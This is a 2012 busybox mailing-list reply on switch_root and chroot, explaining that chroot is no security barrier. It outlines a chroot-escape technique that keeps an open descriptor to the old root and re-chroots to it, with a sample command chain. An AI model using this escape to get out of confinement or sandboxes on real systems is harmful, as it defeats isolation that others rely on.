switch_root and mount move

Laurent Bercot ska-dietlibc at skarnet.org
Wed May 2 23:13:14 UTC 2012


> As I understood from your own description in switch_root.c, you are
> calling chdir("/") to prevent such an ability.
> Can an attacker break out from this chroot (applet called from bash,
> not a chroot() system call in a C program)?

 Same thing. If you can do it in C, you can do it in shell.
 It takes a few lines of C code to write the following programs:

 * "opendir fd dir remainder" performs an opendir() system call on dir,
assigns the result to the fd file descriptor, and execs into remainder.
 * "fchrootdir fd remainder" performs fchdir(fd), close(fd), chroot(".")
and execs into remainder.
 Then breaking out of a chroot is a breeze:
 Say A is the script that runs under a chroot. Instead of writing
"chroot /newroot A", you write "opendir 3 / chroot /newroot fchrootdir 3 A"
and A will execute under the old root, despite the chroot command.

-- 
 Laurent


More information about the busybox mailing list